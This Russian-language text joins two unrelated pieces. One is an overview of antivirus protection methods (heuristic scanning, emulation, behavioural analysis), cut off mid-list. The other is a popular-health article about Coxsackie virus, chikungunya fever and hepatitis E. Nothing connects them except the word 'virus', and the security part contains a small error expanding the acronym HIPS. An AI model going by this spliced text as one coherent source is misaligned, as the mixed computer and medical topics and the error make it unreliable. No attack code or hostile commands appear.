Метод эвристического сканирования призван улучшить способность сканеров применять сигнатуры и распознавать модифицированные вирусы в тех случаях, когда сигнатура совпадает с телом неизвестной программы не на 100%. Данная технология, однако, применяется в современных программах очень осторожно, так как может повысить количество ложных срабатываний.

Проактивная защита
Проактивные технологии – совокупность технологий и методов, используемых в антивирусном программном обеспечении, основной целью которых, в отличие от реактивных (сигнатурных) технологий, является предотвращение заражения системы пользователя, а не поиск уже известного вредоносного программного обеспечения в системе.

История развития проактивных технологий антивирусной защиты
Проактивные технологии начали развиваться практически одновременно с классическими (сигнатурными) технологиями. Однако, первые реализации проактивных технологий антивирусной защиты требовали высокий уровень квалификации пользователя, т.е. не были рассчитаны на массовое использование простыми пользователями персональных компьютеров. Спустя десятилетие антивирусной индустрии стало очевидно, что сигнатурные методы обнаружения уже не могут обеспечить эффективную защиту пользователей. Этот факт и подтолкнул к возрождению проактивных технологий.

Технологии проактивной защиты:

Эвристический анализ

Технология эвристического анализа позволяет на основе анализа кода выполняемого приложения, скрипта или макроса обнаружить участки кода, отвечающие за вредоносную активность.
Эффективность данной технологии не является высокой, что обусловлено большим количеством ложных срабатываний при повышении чувствительности анализатора, а также большим набором техник, используемых авторами вредоносного ПО для обхода эвристического компонента антивирусного ПО.

Эмуляция кода

Технология эмуляции позволяет запускать приложение в среде эмуляции, эмулируя поведение ОС или центрального процессора. При выполнении приложения в режиме эмуляции приложение не сможет нанести вреда системе пользователя, а вредоносное действие будет детектировано эмулятором.
Несмотря на кажущуюся эффективность данного подхода, он также не лишен недостатков – эмуляция занимает слишком много времени и ресурсов компьютера пользователя, что негативно сказывается на быстродействии при выполнении повседневных операций, также, современные вредоносные программы способны обнаруживать выполнение в эмулированной среде и прекращать свое выполнение в ней.

Анализ поведения

Технология анализа поведения основывается на перехвате всех важных системных функций или установке т.н. мини-фильтров, что позволяет отслеживать всю активность в системе пользователя. Технология поведенческого анализа позволяет оценивать не только единичное действие, но и цепочку действий, что многократно повышает эффективность противодействия вирусным угрозам. Также, поведенческий анализ является технологической основой для целого класса программ – поведенческих блокираторов (HIPS – Host-based Intrusion Systems).
и т.д.................

Сегодня сразу несколько вирусов терроризируют мир. И многие, кто собирается в отпуск или командировку, начинают переживать, как бы не привезти ничего из поездки. Самое интересное, говорят эксперты, что сегодня инфекции, которые характерны для стран третьего мира, стали распространяться во вполне благополучных государствах. Что же нужно знать о современных вирусах и как от них защититься — в материале АиФ.ru.

Турецкий Коксаки

В начале лета 2017 года в Россию всколыхнули новости о распространяющемся в Турции вирусе Коксаки. Это вид энтеровирусов, который особенно опасен для детей в возрасте до 10 лет. При этом взрослые ему также могут быть подвержены. Это заболевание нередко называют «рука-нога-рот». Связано такое название со способами передачи. Вирус Коксаки может передаваться как воздушно-капельным путем, так и через грязные руки. Именно поэтому ему чаще всего подвержены дети, которые далеко не всегда соблюдают все требования гигиены. Для людей, у которых нет каких-либо хронических заболеваний, данная патология не является опасной. Достаточно соблюдения постельного режима и приема назначенных лекарств, чтобы встать на ноги уже через 5 дней. Тем же, у кого есть хроническое заболевание, стоит поостеречься и с особенным рвением выполнять рекомендации врача.

В числе симптомов, которые указывают на Коксаки: подъем температуры до высоких значений, расстройство ЖКТ, появление сыпи на теле, боли в горле.

Важно помнить, что осложнения от вируса Коксаки могут быть достаточно тяжелыми: миокардит, энцефалит — вот далеко не самый полный список проблем, возникающих на фоне такой патологии. Профилактики как таковой не существует, но вполне будет достаточно соблюдения простых правил гигиены: тщательное мытье рук после посещения улицы, купания в бассейне и перед всеми приемами пищи, использование бутилированной воды, тщательное мытье фруктов и овощей перед их употреблением.

Индийская лихорадка

Лихорадка Чикунгунья представляет собой вирусное заболевание, при котором отмечаются высокая температура и ломота в суставах. Такое название болезнь получила от глагола, который на языке кимаконде означает «стать искривленным». Такая ассоциация возникла, оттого что люди, страдающие таким заболеванием, буквально скрючиваются и сгорбливаются от боли. Чаще всего лихорадка распространена в Индии и странах Африки и Азии. Но также она может встречаться и в Европе.

Вспышки патологии нередко возникали в мире. Так, первая была в 1952 году в Танзании. В начале 2000-х болезнь проявилась в Конго, в 2007 от нее серьезно пострадали люди в Габоне. Нередко лихорадка становится следствием того, что болезнь завезли. В 2014 году Чикунгунья появилась во Франции.

Вирус передается от человека к человеку через укусы зараженных самок комаров. Переносят его те же виды насекомых, которые передают и вирус Зика. Размножаются комары рядом с искусственными водоемами или емкостями с дождевой водой.

Инкубационный период такой болезни — 4-8 дней после инфицирования, но иногда этот срок может удлиняться до 12 дней. Для лихорадки характерно резкое повышение цифр на градуснике до критических значений, параллельно развивается воспаление и боль в суставах: она характеризуется как сильная и сковывающая. Могут отмечаться проявления мигрирующих болей. В числе дополнительных симптомов называют боли в мышцах, светобоязнь, головные боли, появление сыпи. При адекватном лечении выздоровление наступает через 6-10 дней от его начала, но в некоторых случаях боли в суставах могут отмечаться и в течение нескольких месяцев после окончания болезни, а то и нескольких лет.

Лечение в большинстве случаев симптоматическое, направленное на уменьшение болезненных ощущений. Врачи предлагают больным жаропонижающие средства, болеутоляющие препараты, противовоспалительные лекарства. Также советуют обильное питье.

Новый гепатит

Гепатит Е, который сейчас обнаружили в Великобритании, также является вирусным заболеванием. Передается он фекально-оральным путем, т. е., говоря по-простому, через грязные руки, воду или пищу. Этим он очень похож на гепатит А. Свою классификацию заболевание получило в 1983 году: до этого времени его относили к категории «ни А, ни В». Гепатит Е, если сравнивать его с видом А, чаще становится причиной острых и тяжелых форм, при этом поражает он не только печень, но и почки. Чаще всего таким заболеванием страдают мужчины и представители возрастной группы 15-45 лет.

Инкубационный период болезни составляет 40 дней, но при этом он может варьироваться от 15 суток до 2 месяцев. По симптоматике он выглядит следующим образом. У человека появляется слабость, снижается аппетит, падает работоспособность. Также отмечается повышенная температура, боли справа в области под ребрами, начинают желтеть глаза, кожа. Проявления происходят постепенно, симптоматика нарастает.

Лечат патологию следующим образом. Больной обязательно должен находиться под присмотром врачей. Ему предлагается диета и специализированный курс терапии, используемый при лечении других видов гепатитов. Кроме того, используется и симптоматическое лечение, направленное на предупреждение осложнений со стороны почек.

Профилактика заболевания такая же, как и у Коксаки: тщательное соблюдение личной гигиены и отказ от использования водопроводной воды в странах, где отмечаются случаи такого заболевания.

Стоит ли бояться?

Специалисты рекомендуют не впадать в панику. Ведь далеко не всегда появившиеся инфекции смертельно опасны. «Подавляющее большинство известных сегодня инфекций (я не включаю сюда постоянно мутирующие суперинфекции) тайно существовали в том или ином виде в течение многих столетий до того момента, пока не были обнаружены адептами западной медицины. После этого они стали вызывать массовую озабоченность у общественности. И сейчас, и в прошлом появление новых инфекций всегда было связано с действиями людей, вступивших в контакт с неизвестностью. Самые разнообразные смешения двух и более популяций с разных континентов привели к передаче и быстрому распространению неместных заболеваний. Например, до открытия европейской цивилизацией Америки в Новом Свете не было малярии, натуральной оспы, кори, желтой лихорадки и многих других инфекционных заболеваний, хорошо знакомых европейцам», — говорит врач-специалист по общественному здоровью и здравоохранению Павел Стоцко .

При этом вопросы миграции и различные проблемы здоровья существуют до сих пор и находятся в тесной взаимосвязи. Правда, эта связь поддерживается не инфекциями, а неравным доступом, даже в некоторых развитых странах, к медицинской помощи, к образованию, правозащите, а также дискриминацией и даже изоляцией мигрантов и других незащищенных сообществ и групп населения, уверен эксперт. Общественное неравенство распахивает входные ворота для самых разных инфекций, которым не требуются социальные лифты, чтобы поразить все слои населения. Неконтролируемые — они поражают всех: и бедных, и богатых, и местных, и приезжих.